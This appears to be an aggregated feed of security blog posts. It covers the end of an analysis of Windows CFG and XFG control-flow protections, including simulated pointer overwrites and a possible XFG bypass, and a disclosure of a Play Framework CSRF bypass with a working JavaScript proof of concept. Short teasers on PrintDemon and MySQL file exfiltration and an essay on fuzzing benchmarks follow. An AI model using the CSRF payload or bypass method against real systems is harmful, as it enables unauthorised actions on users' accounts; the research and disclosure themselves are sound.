Looking at the RAX register, which is used to hold the address of the function CFG will check, we see it has been overwritten with Source!protectMe2 instead of Source!cfgTest.

Execution then hits ntdll!LdrpDispatchUserCallTarget. After walking the function, which validates if the in scope function resides within the CFG bitmap for the process, execution redirects to Source!protectMe2!

This is very interesting from an adversarial perspective, as we were successfully able to overwrite a function pointer and CFG didn’t terminate our process! The only caveat being that the function is a part of the current process’s CFG bitmap.

What is even more interesting, is that function pointers protected by CFG can be overwritten by any exported function at runtime! Let’s rework this example, but try to call a Windows API function like KERNELBASE!WriteProcessMemory.

First, we simulate the arbitrary write by overwriting Source!cfgTest1 with KERNELBASE!WriteProcessMemory.

Program execution passes through Source!__guard_dispatch_icall_fptr and ntdll!LdrpDispatchUserCallTarget and we can clearly see execution returns to KERNELBASE!WriteProcessMemory.

This shows that even with CFG enabled, it is still possible to call functions that have overwritten other functions. This is not good, as calls can still be made with malign intent. Additionally, calling functions of different types out of context may result in a type confusion or other programmatic behavioral problems.

Now that we have armed ourselves with an understanding of why CFG is an amazing start to solving the CFI problem, but yet still contains many shortcomings, let’s get into XFG and what makes it better and different.

XFG: The Next Era of CFI for Windows

Let’s start out by talking about what XFG is at a high level. After we go through some high level details about XFG, we will compile our program with XFG and walk through the dispatch function(s), as well as perform some simulated function pointer overwrites to see how XFG reacts and additionally see how XFG differs from CFG.

My last CrowdStrike blog post touches on XFG, but not in too much detail. XFG essentially is a more “hardened” version of CFG. How so? XFG, at compile time, produces a “type-based hash” of a function that is going to be called in a control flow transfer. This hash will be placed 8 bytes above the target function, and will be compared against a preserved version of that hash when an XFG dispatch function is executed. If the hashes match, control flow transfer is then passed to the in scope function that was checked. If the hashes differ, the program crashes.

Let’s take a look a bit more at this. Firstly, let’s compile our program with XFG!

Note that you will need Visual Studio 2019 Preview + at least Windows 10 21H1 in order to use XFG. Additionally, XFG is not found in the GUI compilation options.

Using the /guard:xfg flag in compilation and linking, we can enable XFG for our application.

Notice that even though it was not selected, CFG is still enabled for our application.

Let’s crack open IDA again to see how the main() function looks with the addition of XFG.

Very interesting! Firstly, we can see that R10 takes in the value of the XFG “type-based” hash. Then, a call is performed to the XFG dispatch call __guard_xfg_dispatch_icall_fptr. Note that the hash has been deemed “immutable” by Microsoft and cannot be modified by an attacker, due to its read only state.

In the image, below, the location of the XFG hash is at 00007ff7ded4110c

We can see that this address is executable (obviously) and readable - with the ability to write disabled.

Additionally, you can use the dumpbin tool to print out the functions protected by CFG/XFG. Functions protected by XFG are denoted with an X

Before we move on, one interesting thing to note is that the XFG hash is already placed 8 bytes above an XFG protected function BEFORE any code execution actually occurs.

For instance, Source!cfgTest is an XFG protected function. 8 bytes above this function is the hash seen in the previous image, but with an additional bit set.

We will see why this additional bit has been set when we step through the functions that perform XFG checks.

Moving on, let’s step through this in WinDbg to see what we are working with here, and how execution flow will go.

Firstly, execution lands on the XFG dispatch function.

This time, when the __guard_xfg_dispatch_icall_fptr function is dereferenced, a jump to the function ntdll!LdrpDispatchUserCallTargetXFG is performed.

Firstly, a bitwise OR of the XFG hash and 1 occurs, with the result placed in R10. In our case, this sets a bit in the XFG function hash.

Next, a test al, 0xf operation occurs, which performs a bitwise AND between the lower 8 bits of AX (AL) and 0xf.

As we can see from the image above, this sets the zero flag in our case. Additionally, now we have reached a possible jump within ntdll!LdrpDispatchUserCallTargetXFG

Since the zero flag has been set, we will NOT take the jump and instead move on to the next instruction, test ax, 0xFFF.

Stepping through test ax, 0xFFF, which will perform a bitwise AND with the lower 16 bits of EAX and 0xFFF, plus set the zero flag accordingly, we see that we have cleared the zero flag in the image below. This means the jump will not occur, and we continue to move deeper into the ntdll!LdrpDispatchUserCallTargetXFG function.

Finally, we land on the cmp instruction which compares the hash 8 bytes above RAX (our target function) with the hash preserved in R10.

The compare statement, because the values are equal, causes the zero flag to be set. This skips the next jump, and performs the final jump to our target function in RAX!

This is how a function protected by XFG is checked! Let’s now edit our code a bit and explore XFG a bit more.

Let’s Keep Going!

Recall that an XFG hash is made up of a function’s return type and any parameters. Let’s update our code to invoke another function of a different type.

We have changed the protectMe2() function to a function that returns an integer and takes a parameter of the type integer. This is different than our void cfgTest() function. We also set a function pointer, int (*cfgTest2) equal to the int protectMe2() function in order to create a new XFG hash for a different function type (int in this case). Let’s recompile our program and disassemble it in IDA to see how the two functions may vary from an XFG perspective.

Very interesting! As we can see from the above image, there are two different hashes now. The hash for our original function has remained the same. However, the hash for the int protectMe2() function is very different, but the last 12 bits of each hash in hexadecimal is 870 in our case. This interesting and may be worth noting.

Additionally, static and dynamic analysis both show that even before any code has executed, the actual hash that is placed 8 bytes above each function. Additionally, the hashes already have an additional bit set, just as we saw last time.

Let’s take this opportunity to showcase why XFG is significantly stronger than CFG.

Let’s simulate an arbitrary write again by overwriting what Source!cfgTest1 points to with Source!protectMe2.

After simulating the arbitrary write, we pick up execution in ntdll!LdrpDispatchUserCallTargetXFG again. Stepping through a few instructions, we once again land on the cmp instruction which checks to see if the preserved XFG hash matches the current XFG hash.

As we can see below, the hashes do not match!

Since the hashes do not match, this will cause XFG to determine a function pointer has been overwritten with something it should not have been overwritten with - and causes a program crash. Even though the function pointer was overwritten by another function within the same bitmap - XFG still will crash the process.

Let’s examine another scenario, with two functions of the same return type - but not the same amount of parameters.

To achieve this, our code has been edited to the following.

As we can see from the above image, we are using all integer functions now. However, the int cfgTest() function has two more parameters than the int protectMe2() function. Let’s compile and perform some static analysis in IDA.

The only difference between the two functions protected by XFG is the amount of parameters that int cfgTest() has, and yet the hashes are TOTALLY different. From a defensive perspective, it seems like even very similar functions are viewed as “very different”.

Additionally, we notice that the last 12 bits of the int cfgTest() hash have become 371 in hexadecimal instead of the previously mentioned 871 value. This means that XFG hashes seem to be unique until the last 8 bits. This is indicative of the hash only being unique up until about 56 bits.

As a sanity check and for completeness sake, let’s see what happens when two identical functions are assigned an XFG hash.

OMG Samesies!

Here is an edited version of our code, with two identical functions.

Disassembling the functions in IDA, we can see that the hashes this time are identical.

Obviously, since the hashing process for an XFG hash takes a function prototype and hashes it, the two hashes are going to be the same. I would not call this a flaw at all, because it is obvious Microsoft knew to this going in. However, I feel this is a nice win for Microsoft in terms of their overall CFI strategy because as David pointed out, this was very little overhead to the already existing CFG infrastructure.

However, from an adversarial standpoint - it must be said. XFG functions can be overwritten, so long as the function is basically an identical prototype of the original function.

Potential Bypasses?

As mentioned above, utilizing functions of identical prototypes generates identical XFG hashes. Knowing this, it seems as though it could be possible to overwrite a function with an identical function of the same prototype. This is SIGNIFICANTLY stronger than CFG in terms of what functions can actually be called.

Let’s talk about one more (potential) additional potential bypass.

As we know, functions protected by XFG have an XFG hash placed above them (8 bytes above to be more specific). What would happen for instance, if we performed a function pointer overwrite and called into the middle of a function, like KERNELBASE!VirtualProtect.

As we can see from the above image, calling into the middle of this function shows us that these hex numbers are being interpreted as opcodes, not memory addresses. This means that if XFG checks if a function pointer is overwritten by KERNELBASE!VirtualProtect, it would load the address of this function into RAX per the usual routine for XFG/CFG function checks. Then, this address is dereferenced at an offset of negative 8 to perform the XFG check. When this dereference happens, since this address contains opcodes, the opcodes that are present when calling into the middle of the function will be used in the XFG check.

Let’s perform a function pointer overwrite.

Note that the machine was restarted in between screenshots, causing addresses to change (but the symbols will remain the same).

Next, let’s step through the XFG dispatch functions and reach the compare statement.

Hitting the compare statement, we can see that R10 contains the preserved XFG hash, while RAX just contains the address of KERNELBASE!VirtualProtect + 0x50.

Taking a look at RAX - 8, where the XFG check occurs, we can see that the opcodes that reside within KERNELBASE!VirutalProtect are being treated as the “compared hash”.

Although this compare will fail, this brings up an interesting point.

Since calling into a middle of a function results in the function’s data being treated as opcodes and not memory addresses (usually), it may be possible for an adversary to utilize an arbitrary read/write primitive to do the following.

  1. Locate the XFG hash for a function you want to overwrite
  2. Perform a loop to dereference the process space’s memory and look for patterns that are identical to the XFG hash (remember, we still have to abide by CFG’s rules and choosing a function exported by the application or a function that is additionally located in the same bitmap)
  3. Overwrite the function pointer with any viable candidates

Although you most likely are going to be very hard pressed to find anything identical to the hash in terms of opcodes in the middle of a function AND additionally make whatever you find useful from an attacker’s perspective, this is still possible it seems.

Final Thoughts

I think personally that XFG is an awesome mitigation and I am excited to see how people get creative with the solution. However, until CET comes into play, overwriting return addresses on the stack seems like it will still be fair game. I think the combination of XFG and CET is going to be very interesting for exploitation in the future. I think XFG is a great and pretty creative mitigation. However, it has yet to be seen yet how it performs against Indirect Branch Tracking (IBT), which is CET’s forward-edge protection. All together, I think Microsoft has done a great thing with XFG by implementing it and not letting all of the work done with CFG go to waste.

As always! Peace, love, and positivity :-)

The Current State of Exploit Development, Part 2

20 August 2020 at 00:00

CrowdStrike Blog

Today I am very happy to have released my second blog for CrowdStrike! This blog, which builds off of my last one, talks about some additional mitigations like ACG, XFG, and VBS/HVCI which have made exploitation more expensive and time consuming. This blog rounds out the series and I hope you have found it useful! I learned a lot when I put this two part series together.

You can find the blog here. Enjoy!

CSRF Protection Bypass in Play Framework

19 August 2020 at 22:00

This blog post illustrates a vulnerability affecting the Play framework that we discovered during a client engagement. This issue allows a complete Cross-Site Request Forgery (CSRF) protection bypass under specific configurations.

By their own words, the Play Framework is a high velocity web framework for java and scala. It is built on Akka which is a toolkit for building highly concurrent, distributed, and resilient message-driven applications for Java and Scala.

Play is a widely used framework and is deployed on web platforms for both large and small organizations, such as Verizon, Walmart, The Guardian, LinkedIn, Samsung and many others.

Old school anti-CSRF mechanism

In older versions of the framework, CSRF protection were provided by an insecure baseline mechanism - even when CSRF tokens were not present in the HTTP requests.

This mechanism was based on the basic differences between Simple Requests and Preflighted Requests. Let’s explore the details of that.

A Simple Request has a strict ruleset. Whenever these rules are followed, the user agent (e.g. a browser) won’t issue an OPTIONS request even if this is through XMLHttpRequest. All rules and details can be seen in this Mozilla’s Developer Page, although we are primarily interested in the Content-Type ruleset.

The Content-Type header for simple requests can contain one of three values:

  • application/x-www-form-urlencoded
  • multipart/form-data
  • text/plain

If you specify a different Content-Type, such as application/json, then the browser will send a OPTIONS request to verify that the web server allows such a request.

Now that we understand the differences between preflighted and simple requests, we can continue onwards to understand how Play used to protect against CSRF attacks.

In older versions of the framework (until version 2.5, included), a black-list approach on receiving Content-Type headers was used as a CSRF prevention mechanism.

In the 2.8.x migration guide, we can see how users could restore Play’s old default behavior if required by legacy systems or other dependencies:

application.conf

play.filters.csrf {
  header {
    bypassHeaders {
      X-Requested-With = "*"
      Csrf-Token = "nocheck"
    }
    protectHeaders = null
  }
  bypassCorsTrustedOrigins = false
  method {
    whiteList = []
    blackList = ["POST"]
  }
  contentType.blackList = ["application/x-www-form-urlencoded", "multipart/form-data", "text/plain"]
}

In the snippet above we can see the core of the old protection. The contentType.blackList setting contains three values, which are identical to the content type of “simple requests”. This has been considered as a valid (although not ideal) protection since the following scenarios are prevented:

  • attacker.com embeds a <form> element which posts to victim.com
    • Form allows form-urlencoded, multipart or plain, which are all blocked by the mechanism
  • attacker.com uses XHR to POST to victim.com with application/json
    • Since application/json is not a “simple request”, an OPTIONS will be sent and (assuming a proper configuration) CORS will block the request
  • victim.com uses XHR to POST to victim.com with application/json
    • This works as it should, since the request is not cross-site but within the same domain

Hence, you now have CSRF protection. Or do you?

Looking for a bypass

Armed with this knowledge, the first thing that comes to mind is that we need to make the browser issue a request that does not trigger a preflight and that does not match any values in the contentType.blackList setting.

The first thing we did was map out requests that we could modify without sending an OPTIONS preflight. This came down to a single request: Content-Type: multipart/form-data

This appeared immediately interesting thanks to the boundary value: Content-Type: multipart/form-data; boundary=something

The description can be found here:

For multipart entities the boundary directive is required, which consists of 1 to 70 characters from a set of characters known to be very robust through email gateways, and not ending with white space. It is used to encapsulate the boundaries of the multiple parts of the message. Often, the header boundary is prepended with two dashes and the final boundary has two dashes appended at the end.

So, we have a field that can actually be modified with plenty of different characters and it is all attacker-controlled.

Now we need to dig deep into the parsing of these headers. In order to do that, we need to take a look at Akka HTTP which is what the Play framework is based on.

Looking at HttpHeaderParser.scala, we can see that these headers are always parsed:

private val alwaysParsedHeaders = Set[String](
    "connection",
    "content-encoding",
    "content-length",
    "content-type",
    "expect",
    "host",
    "sec-websocket-key",
    "sec-websocket-protocol",
    "sec-websocket-version",
    "transfer-encoding",
    "upgrade"
)

And the parsing rules can be seen in HeaderParser.scala which follows RFC 7230 Hypertext Transfer Protocol (HTTP/1.1): Message Syntax and Routing, June 2014.

def `header-field-value`: Rule1[String] = rule {
FWS ~ clearSB() ~ `field-value` ~ FWS ~ EOI ~ push(sb.toString)
}
def `field-value` = {
var fwsStart = cursor rule {
zeroOrMore(`field-value-chunk`).separatedBy { // zeroOrMore because we need to also accept empty values
run { fwsStart = cursor } ~ FWS ~ &(`field-value-char`) ~ run { if (cursor > fwsStart) sb.append(' ') }
} }
}
def `field-value-chunk` = rule { oneOrMore(`field-value-char` ~ appendSB()) } def `field-value-char` = rule { VCHAR | `obs-text` }
def FWS = rule { zeroOrMore(WSP) ~ zeroOrMore(`obs-fold`) } def `obs-fold` = rule { CRLF ~ oneOrMore(WSP) }

If these parsing rules are not obeyed, the value will be set to None. Perfect! That is exactly what we need for bypassing the CSRF protection - a “simple request” that will then be set to None thus bypassing the blacklist.

How do we actually forge a request that is allowed by the browser, but it is considered invalid by the Akka HTTP parsing code?

We decided to let fuzzing answer that, and quickly discovered that the following transformation worked: Content-Type: multipart/form-data; boundary=—some;randomboundaryvalue

An extra semicolon inside the boundary value would do the trick and mark the request as illegal:

POST /count HTTP/1.1
Host: play.local:9000
...
Content-Type: multipart/form-data;boundary=------;---------------------139501139415121
Content-Length: 0

Response

Response:
HTTP/1.1 200 OK
...
Content-Type: text/plain; charset=UTF-8 Content-Length: 1
5

This is also confirmed by looking at the logs of the server in development mode:

a.a.ActorSystemImpl - Illegal header: Illegal 'content-type' header: Invalid input 'EOI', exptected tchar, OWS or ws (line 1, column 74): multipart/form-data;boundary=------;---------------------139501139415121

And by instrumenting the Play framework code to print the value of the Content-Type:

Content-Type: None

Finally, we built the following proof-of-concept and notified our client (along with the Play framework maintainers):

<html>
    <body>
        <h1>Play Framework CSRF bypass</h1>
        <button type="button" onclick="poc()">PWN</button> <p id="demo"></p>
        <script>
        function poc() {
            var xhttp = new XMLHttpRequest(); xhttp.onreadystatechange = function() {
                if (this.readyState == 4 && this.status == 200) {
                    document.getElementById("demo").innerHTML = this.responseText; 
                } 
            };
            xhttp.open("POST", "http://play.local:9000/count", true);
            xhttp.setRequestHeader(
                "Content-type",
                "multipart/form-data; boundary=------;---------------------139501139415121"
            );
            xhttp.withCredentials = true;
            xhttp.send("");
        }
        </script>
    </body>
</html>

Credits & Disclosure

This vulnerability was discovered by Kevin Joensen and reported to the Play framework via [email protected] on April 24, 2020. This issue was fixed on Play 2.8.2 and 2.7.5. CVE-2020-12480 and all details have been published by the vendor on August 10, 2020. Thanks to James Roper of Lightbend for the assistance.

CVE-2020-1337 – PrintDemon is dead, long live PrintDemon!

By: voidsec
11 August 2020 at 12:52

Banner Image by Sergio Kalisiak TL; DR: I will explain, in details, how to trigger PrintDemon exploit and dissect how I’ve discovered a new 0-day; Microsoft Windows EoP CVE-2020-1337, a bypass of PrintDemon’s recent patch via a Junction Directory (TOCTOU). Contents PrintDemon primer, how the exploit works? PrinterPort WritePrinter Shadow Job File Binary Diffing CVE-2020-1048 […]

The post CVE-2020-1337 – PrintDemon is dead, long live PrintDemon! appeared first on VoidSec.

Some thoughts on fuzzing

11 August 2020 at 07:11

Foreward

This blog is a bit weird, this is actually a message I posted in response to a fuzzbench issue, but honestly, I think it warranted a blog, even if it’s a bit unpolished!

You can find the discussion at fuzzbench issue tracker #654

Social

I’ve been streaming a lot more regularly on my Twitch! I’ve developed hypervisors for fuzzing, mutators, emulators, and just done a lot of fun fuzzing work on stream. Come on by!

Follow me at @gamozolabs on Twitter if you want notifications when new blogs come up. I often will post data and graphs from data as it comes in and I learn!

The blog

Hello again Today!

So, I’d like to address a few things that I’ve thought of a bit more over time and want to emphasize.

Visualizations, and what I’m often looking for in data

When it comes to visualizations, I don’t really mind much which graphs are displayed by default, linear vs logscale, time-based or per-case-based, but they should both be toggleable in the default. I’m not web dev, but having an interactive graph would be pretty nice, allowing for turning on and off of certain lines, zooming in and out, and changing scales/axes. But, I think we’re in agreement here. I personally believe that logscale should be default, and I don’t see how it’s anything but better, unless you only care about seeing where things “flatten out”. But in that case, it’s just as visible in logscale, you just have to be logscale aware.

Here’s an example of typically what I graph when I’m running and tuning a fuzzer. I’m using doing side-by-side comparisons of small fuzzer tweaks, to my prior best runs, and plotting both on a time domain and a fuzz case domain. I’ve included the linear-scale plots just for comparison with the way we currently do things, but I personally never use linear scale as I just find it to be worse in all aspects.

image

By using a linear scale, we’re unable to see anything about what happens in the fuzzer in the first ~20 min or so. We just see a vertical line. In the log scale we see a lot more which is happening. This graph is comparing a fuzzer which does rand() % 20 rounds of mutation (medium corruption), versus rand % 5 rounds of the same corruption (low corruption). We can see that early on medium corruption has much better properties, as it explores more aggressively. But there’s actually a point where they cross, and this is likely the point where the corruption becomes too great on average in the medium corruption, and ends up “ruining” previously good inputs, dramatically reducing the frequency we see good cases. It’s important to note, that since the medium corruption is a superset of low corruption (eg, there’s a chance to do low corruption), both graphs would eventually converge to the exact same value.

There’s just so much information in this graph that stands out to me. I see that something about medium corruption performs well in the first ~100 seconds. There’s a really good lead at the early few seconds, and it tapers off throughout. This gives me feedback on maybe when and where I should use this level of corruption.

Further, since I have both a fuzz case graph and a time graph, I can see that medium corruption early on actually has better performance than low corruption. Once again, this makes sense, the more corruption, the more likely you are to make a more invalid input which is parsed more shallow. But from the coverage over case, I see that this isn’t a long term thing and eventually the performance seems to converge between the two. It’s important to note, the intersection point of the two lines varies by quite a bit in both the case domain and the time domain. This tells me that even though I just changed the mutator, it has affected the performance, likely due to the depth of the average input in the corpus, really neat!

Example analysis conclusion

I see that medium corruption in this case is giving me about 10x speedup in time-to-same-coverage, and also some performance benefits early on. I should adopt a dynamic corruption model which tunes this corruption amount maybe against time, or ideally, some other metric I could extract from the target or stats. I see that long-term, the low corruption starts to win, and for something that I’d run for a week, I’d much rather run the low corruption.

Even though this program is very simple, these graphs could pretty arbitrary be stretched out to different time axis. If fuzzbench picks a deadline, for example, 1000 seconds, we would never know this about the fuzzer performance. I think this is likely what many fuzzers are now being tuned to, as the benchmarks often are 12/24/72 hour increments. Fuzzers often get some extra blips even deeper in the runs, and it’s really hard to estimate if these crosses would ever occur.

The case for cases

I personally extract most information from graphs which are plotted against number of fuzz cases rather than time. By doing benchmarks in a time domain, you factor in the performance of the fuzzer. This is this ground truth, and what really matters at the end of the day with complete products. But it’s not the ground truth for fuzzers in development. For example, if I wanted to prototype a new mutation strategy for AFL, I would be forced to do it in C, avoid inefficient copies, avoid mallocs, etc. I effectively have to make sure my mutator is at-or-better than existing AFL mutator performance to use benchmarks like this.

When you do development on fuzz cases, you can start to inspect the efficiency of the fuzzer in terms of quality of cases produced. I could prototype a mutator in python for all I care, and see if it performs better than the stock AFL mutators. This allows me to cut corners and spend 1 day trying out a mutator, rather than 1 month making a mutator and then doing complex optimizations to make it work. During early stages of development, I would expect a developer to understand the ramifications of making it faster, and to have a ballpark idea of where it could be if the O(n^3) logic was turned into O(log n), and whether it’s possible.

Often times, the first pass of an attempt is going to be crude, and for no reason other than laziness (and not in a negative way)! There’s a time and a place to polish and optimize a technique, and it’s important that there can be information learned from very preliminary results. Most performance in standard feedback mechanisms and mutation strategies can be solved with a little bit of engineering, and most developers should be able to gauge the best-case big-O for their strategy, even if that’s not the algorithmic complexity of their initial implementation.

Yep, looking at coverage over cases adds nuance, but I think we can handle it. Given most fuzzing tools, especially initial passes, are already so un-optimized, I’m really not worried about any performance differences in AFL/libfuzzer/etc when it comes to single-core performance.

Scaling

Scaling of performance is really missing from fuzzbench. At every company I’ve worked at, big and small, even for the most simple targets we’re fuzzing we’re running at least ~50-100 cores. I presume (I don’t know for sure) that fuzzbench is comparing single core performance. That’s great, it’s a useful stat and one I often control for, as single-core, coverage/case is often controlled for both scaling and performance, leading to great introspection into the raw logic of the fuzzer.

However, in reality, the scaling of these tools is critical for actual use. If AFL is 20% faster single-core, that’ll likely make it show up at the top of fuzzbench, given relative parity of mutation strategies. That’s great, the performance takes engineering effort and should not be undervalued. In fact, most of my research is focused around making fuzzers fast, I’ve got multiple fuzzers that can handle 10s of billions of fuzz cases per second on a single machine. It’s a lot of work to make these tools scale, much more so than single-core performance, which is often algorithmic fixes.

If AFL is 20% faster single-core, but bottlenecks on fork(), or write(), and thus only scales to 20-30 cores (often where I see AFL really fall apart, on medium size targets, 5-10 cores for small targets). But something like libfuzzer manages things in memory and can scale linearly with as many cores as you throw it, libfuzzer is going to blow away any 20% performance gains seen single-core.

This information is very hard to benchmark. Well, not hard, but costly. Effectively, I’d like to see benchmarks of fuzzers scaled to ~16 cores on a single server, and ~128 cores distributed across at least 4 servers. This benchmarks. A. the possibility the fuzzer can scale in the first place, if it can’t that’s a big hit to real-world usability. B. the possibility it can scale across servers (often, over the network). Things like AFL-over-SMB would have brutal scaling properties here. C. the scalability properties between cores on the same server, and how they transfer over the network.

I find it very unlikely that these fuzzers being benchmarked even remotely have similar scaling properties. AFL struggles to scale even on a single server, even in persistent mode, due to the heavy use of syscalls and blocking IPC every fuzz case (signal(), read(), write(), per case IIRC, ~3-4 syscalls).

Scaling also puts a lot of pressure on infeasible fuzzing strategies proposed in papers. We’ve all seen them, the high-introspection techniques which extract memory, register, taint state from a small program and promise great results. I don’t disagree with the results, the more information you extract, pretty much directly correlates to an increase in coverage/case. But, eventually the data load gets very hard to share between cores, queue between servers, and even just process.

Measuring symbolic

Measuring symbolic was brought up a few times, as it would definitely have a much better coverage/case than a traditional fuzzer. But this nuance can easily be handled by looking at both coverage/case and coverage/time graphs. Learning what works well algorithmicly should drive our engineering efforts to solve problems. While symbolic may have huge performance issues, it’s very likely, that many of the parts of it (eg. taint tracking) can be approximated with lossy algorithms and data capturing, and it’s more about learning where it has strengths and weaknesses. Many of the analyses I’ve done on symbolic largely lead me to vectorized emulation, which allows for highly-compressed, approximated taint tracking, while still getting near-native (or even better) execution speeds.

The case against monolithic fuzzers

Learning what works is important to figure out where to invest our engineering time. Given the quality of code in fuzzing right now (often very poor), there’s a lot of things that I’d hate to see us rule out because our current methodologies do not support them. I really care about my reset times of fuzz cases, (often: the fork() costs), as well as determinism. In a fully deterministic environment, with fast resets, a lot of approximate strategies can be used. Trying to approximate where bytes came from in an input, flipping the bytes because you have a branch target which is interesting, and then smashing those bytes in can give good information about the relation of those bytes to the input. Hell, with fast resets and forking, you can do partial fuzzing where you fork() and snapshot multiple times during a fuzz case, and you can progressively fuzz “from” different points in the parser. This works especially well for protocols where you can snapshot at each packet boundary.

These sorts of techniques and analyses don’t really work when we have monolithic fuzzers. The performance of existing fuzzers is often quite poor (AFL fork(), etc), or does not support partial execution (persistent modes, libfuzzer, etc). This leads to us not being able to even research these techniques. As we keep bolting things onto existing fuzzers and treating them like big blobs, we’ll get further and further from being able to learn the isolated properties of fuzzers and find the best places to apply certain strategies.

Why I don’t care much about fuzzer performance for benchmarking

Reset speed

AFL fork() bottlenecks for me often around 10-20k execs/sec on a single core, and about 40-50k on the whole system, even with 96C/192T systems. This is largely due to just getting stuck on kernel allocations and locks. Spinning up processes is expensive, and largely out of our control. AFL allows access of the local system and kernel to the fuzz case, thus cases are not deterministic, nor are they isolated (in the case of fuzzing something with lock files). This requires using another abstraction layer like docker, which adds more overhead to the equation. My hypervisors that I use for fuzzing can reset a Windows VM 1 million times per second on a single core, and scale linearly with cores, while being deterministic. Why does this matter? Well, we’re comparing tooling which isn’t even remotely hitting the capabilities of the CPUs, rather they’re bottlenecking on the kernel. These are solvable problems, and thus, as a consumer of good ideas but not tooling, I’m interested in what works well. I can make it go fast myself.

Determinism

Most fuzzers that we work with now are not deterministic. You cannot expect instruction-for-instruction determinism between cases. This makes it a lot harder to use complex fuzzing strategies which may rely on the results of a prior execution being identical to a future one. This is largely an engineering problem, and can be solved in both system-level and app-level targets.

Mutation performance

The performance of mutators is often not what it can be. For example, honggfuzz used (now fixed, cheers!) temporary allocations during multiple passes. During its mangle_MemSwap it made a copy of the chunk that was to be swapped, performing 3 memcpys and using a temporary allocation. This logic was able to be implemented using a single memcpy and without a dynamic allocation. This is not a criticism of honggfuzz, but more of an important note of how development often occurs. Early prototyping, success, and rare revisiting of what can be changed. What’s my point here? Well, the mutation strategies in many fuzzers may introduce timing properties that are not fundamentally required to have identical behaviors. There’s nothing wrong with this, but it is additional noise which factors into time-based benchmarks. This means a good strategy can be hurt by a bad implementation, or, just a naive one that was done early on. This is noise that I think is big to remove from analysis such that we can try to learn what ideas work, and engineer them later.

Further, I don’t know of any mutational fuzzer which doesn’t mutate in-place. This means the multiple splices and removals from an input must end up memcpy()ing the remainder. This is a very common mutation pass. This means the fuzzer exponentially slows down WRT the input file size. Something we see almost every fuzzer put insane restrictions on (AFL has a fit if you give it anything but a tiny file).

There’s nothing stopping us from making a tree-based fuzzer where a splice adds a node to the tree and updates metadata on other nodes. The input could be serialized once when it’s ready to be consumed, or even better, serialized on-demand, only providing the parts of the file which actually were used during the fuzz case.

Example:

Initial input: "foobar", tree is [pointer to "foobar", length 6]
Splice "baz" at 3: [pointer to "foo", length 3][pointer to "baz", length 3][pointer to "bar", length 3]
Program read()s 3 bytes, return "foo" without serializing the rest
Program crashes, tree can be saved or even just what has read can be saved

In this, the cost is N updates to some basic metadata, where N is the number of mutations performed on that input (often 5-10). On a new fuzz case, you start with an initial input in one node of the tree, and you can once again split it up as needed. Pretty much no memcpys() need to be performed, nor allocations, as the input can be extended such that in-memory it’s “foobarbaz”, but the metadata describes that the “baz” should come between “foo”, and “bar”.

Restructuring the way we do mutations like this allows us to probably easily find 10x improvements in mutator performance (read, not overall fuzzer performance). Meaning, I don’t really want the cost of the mutator to be part of the equation, because once again, it’s likely a result of laziness or simplicity. If something really brings a strategy to the table that is excellent, we can likely make it work just as fast (but likely even faster), than existing strategies.

Not to note the value in potentially knowing which mutations were used during prior cases, and you could potentially mutate this tree (eg, change a splice from 5 bytes to 8 bytes, without changing the offset, just changing the node in the mutation tree). This could also be used as a mechanism to dynamically weight mutation strategies based on yields, while still getting a performance gain over the naive implementation.

Performance conclusion

From previous work with fuzzers, most of the reset, overhead, and corruption logic is likely not even within an order of magnitude of the possible performance. Thus, I’m far more interested in figuring out what and where strategies work, as the implementations of them are typically not indicative of their performance.

BUT! I recognize the value in treating them as whole systems. I’m a bit more on the hard-core engineering side of the problem. I’m interested in which strategies work, not which tools. There’s definitely value in knowing which tools will work best, given you don’t have the time to tweak or rebuild them yourself. That being said, I think scaling is much more important here, as I don’t know of really anyone doing single-core fuzzing. The results of these fuzzers at scale is likely dramatically different from single-core, and would put some major pressure on some more theoretical ideas which produce way too much information to consume and handle.

Reconstructing the full picture from data

The data I would like to see fuzzbench give, and I’d give you some massive props for doing it, would be the raw, microsecond-timestamped information for each coverage gained.

This means, every time coverage increases, a new CSV record (or whatever format) is generated, including the time stamp when it was found (to the microsecond), as well as the fuzz iteration ID which indicates how many inputs have been run into the fuzzer. This should also include a unique identifier of the block which was found.

This means, in post, the entire progress of the fuzzer can be reconstructed. Every edge, which edges they were, the times they were found, and the case ID they were on when they were found allows comparing not only the raw “edge count” but also the differences between edges found. It’s crazy that this information is not part of the benchmark, as almost all the fuzzers could be finding nearly the same coverage, but a fuzzer which finds less coverage, but completely unique edges, would be devalued.

This is the firehose of data, but since it’s not collected on an interval, it very quickly turns into almost no data.

Hard problem: What is coverage?

This leads to a really hard problem. How do we compare coverage between tools? Can we safely create a unique block identifier which is universal between all the fuzzers and their targets. I have no idea how fuzzbench solves this (or even if it does). If fuzzbench is relying on the fuzzers to have roughly the same idea of what an edge is, I’d say the results are completely invalid. Having different passes which add different coverage gathering, compare information gathering, could easily affect the graphs. Even just non-determinism in clang (or whatever compiler) would make me uneasy about if afl-clang binaries have identical graph shapes to libfuzzer-clang binaries.

If fuzzbench does solve this problem, I’m curious as to how. I’d anticipate it would be through a coverage pass which is standardized between all targets. If this is the case, are they using the same binaries? If they’re not, are the binaries deterministic, or can the fuzzers affect the benchmark coverage information due to adding their own compiler instrumentation.

Further, if this is the case, it makes it much harder to compare emulators or other tools which gather their own coverage in a unique way. For example, if my emulators, which get coverage for effectively free, had to run an instrumented binary for fuzzbench to get data, it’s not a realistic comparison. My fuzzer would be penalized twice for coverage gathering, even though it doesn’t need the instrumented binary.

Maybe someone solved this problem, and I’m curious what the solution is. TL;DR: Are we actually comparing the same binaries with identical graphs, and is this fair to fuzzers which do not need compile-time instrumentation.

The end

Can’t wait for more discussion. You have been very receptive even when I’m often a bit strongly opinion-ed. I respect that a lot.

Stay cute,

gamozo

The Current State of Exploit Development, Part 1

6 August 2020 at 00:00

CrowdStrike Blog

As you may or may not know, I work at CrowdStrike for my day job. I am also apart of the red team and do not do any official exploit development/vulnerability research. I wanted to address why binary exploits often aren’t as used anymore in typical red team toolkits and explain although the impact of a binary exploit, especially in the kernel, is far more effective than typical red team TTPs - is the return on investment worth it? I would love to see, personally, some red team research shift towards kernel exploits for local privilege escalation - which is often one of the more difficult parts of a penetration tests. But is binary exploitation even worth it at this point for red team work? Let’s find out!

Enjoy! Part 1

Sometimes they come back: exfiltration through MySQL and CVE-2020-11579

28 July 2020 at 14:18
Let’s jump straight to the strange behavior: up until PHP 7.2.16 it was possible by default to exfiltrate local files via the MySQL LOCAL INFILE feature through the connection to a malicious MySQL server. Considering that the previous PHP versions are still the majority in use, these exploits will remain useful for quite some time. Like many other vulnerabilities, after reading about this quite-unknown attack technique (1, 2), I could not wait to find a vulnerable software where to practice such unusual dynamic.

